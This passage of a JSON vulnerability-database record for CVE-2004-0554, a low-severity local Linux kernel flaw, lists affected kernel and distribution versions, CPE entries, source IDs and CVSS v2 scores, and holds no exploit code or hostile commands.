        "version": "8.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 2.2,
        "vendor": "suse",
        "version": "8.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "gentoo",
        "version": "1.4"
      },
      {
        "model": "converged communications server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "suse",
        "version": "8"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "suse",
        "version": "7"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "suse",
        "version": "9.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "email server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "3.1"
      },
      {
        "model": "linux firewall cd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "3.0"
      },
      {
        "model": "s8500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "conectiva",
        "version": "9.0"
      },
      {
        "model": "modular messaging message storage server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "s3400"
      },
      {
        "model": "s8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.0"
      },
      {
        "model": "linux connectivity server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "conectiva",
        "version": "8.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.0"
      },
      {
        "model": "linux admin-cd for firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "s8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "8.2"
      },
      {
        "model": "office server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "s8500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.0"
      },
      {
        "model": "linux database server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "s8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.1"
      },
      {
        "model": "linux office server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "intuity audix",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "*"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "9.0"
      },
      {
        "model": "email server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "iii"
      },
      {
        "model": "s8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "avaya",
        "version": "r2.0.1"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "conectiva",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "guardian digital",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "mandrakesoft",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "slackware",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "suse",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "trustix secure linux",
        "version": null
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "2.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "2.1"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3.0"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "7"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "8"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (ws)"
      },
      {
        "model": "linux office server",
        "scope": null,
        "trust": 0.6,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux firewall on cd",
        "scope": null,
        "trust": 0.6,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux database server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "s u s e",
        "version": "0"
      },
      {
        "model": "linux connectivity server",
        "scope": null,
        "trust": 0.6,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux admin-cd for firewall",
        "scope": null,
        "trust": 0.6,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "s8700 r2.0.1",
        "scope": null,
        "trust": 0.6,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8700 r2.0.0",
        "scope": null,
        "trust": 0.6,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8500 r2.0.1",
        "scope": null,
        "trust": 0.6,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8500 r2.0.0",
        "scope": null,
        "trust": 0.6,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8300 r2.0.1",
        "scope": null,
        "trust": 0.6,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8300 r2.0.0",
        "scope": null,
        "trust": 0.6,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s3400 message application server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "avaya",
        "version": "0"
      },
      {
        "model": "intuity lx",
        "scope": null,
        "trust": 0.6,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "enterprise server -u1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "tinysofa",
        "version": "1.0"
      },
      {
        "model": "enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "tinysofa",
        "version": "1.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "9"
      },
      {
        "model": "linux mandrake amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.0"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.0"
      },
      {
        "model": "linux mandrake amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.2"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.2"
      },
      {
        "model": "linux mandrake ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.1"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.1"
      },
      {
        "model": "multi network firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.0"
      },
      {
        "model": "corporate server x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "corporate server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.20"
      },
      {
        "model": "secure professional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "engarde",
        "version": "1.5"
      },
      {
        "model": "secure community",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "engarde",
        "version": "2.0"
      },
      {
        "model": "enterprise server -u2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "tinysofa",
        "version": "1.0"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.2.19"
      },
      {
        "model": "linux kernel pre6-gentoo",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "gentoo",
        "version": "2.4.26"
      },
      {
        "model": "linux kernel -rc3-gentoo",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "gentoo",
        "version": "2.4.26"
      },
      {
        "model": "secure linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "trustix",
        "version": "2.1"
      },
      {
        "model": "secure linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "trustix",
        "version": "2.0"
      },
      {
        "model": "secure enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "trustix",
        "version": "2.0"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "8"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "7"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "8.0"
      },
      {
        "model": "suse email server iii",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "suse email server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "3.1"
      },
      {
        "model": "office server",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.1"
      },
      {
        "model": "linux personal x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.0"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.0"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "8.2"
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "advanced workstation for the itanium processor ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#973654"
      },
      {
        "db": "BID",
        "id": "10538"
      },
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000225"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-053"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0554"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.1:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.6:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:3.0:*:workstation:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:7:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:converged_communications_server:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:2.1:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:2.1:*:workstation:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.1:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.7:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:2.1:*:advanced_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.0:*:i386:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:avaya:modular_messaging_message_storage_server:s3400:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:gentoo:linux:1.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:3.0:*:advanced_servers:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:3.0:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.0:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_firewall_cd:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_office_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8700:r2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:conectiva:linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_email_server:iii:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_admin-cd_for_firewall:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8300:r2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8500:r2.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avaya:intuity_audix:*:*:lx:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_email_server:3.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_office_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8300:r2.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:conectiva:linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_connectivity_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:suse:suse_linux_database_server:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8500:r2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8700:r2.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0554"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Alexander Viro",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-053"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2004-0554",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 2.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 2.1,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2004-0554",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 2.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "VHN-8984",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2004-0554",
            "trust": 1.8,
            "value": "LOW"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#973654",
            "trust": 0.8,
            "value": "11.81"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200408-053",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULHUB",
            "id": "VHN-8984",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#973654"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8984"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000225"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-053"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0554"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
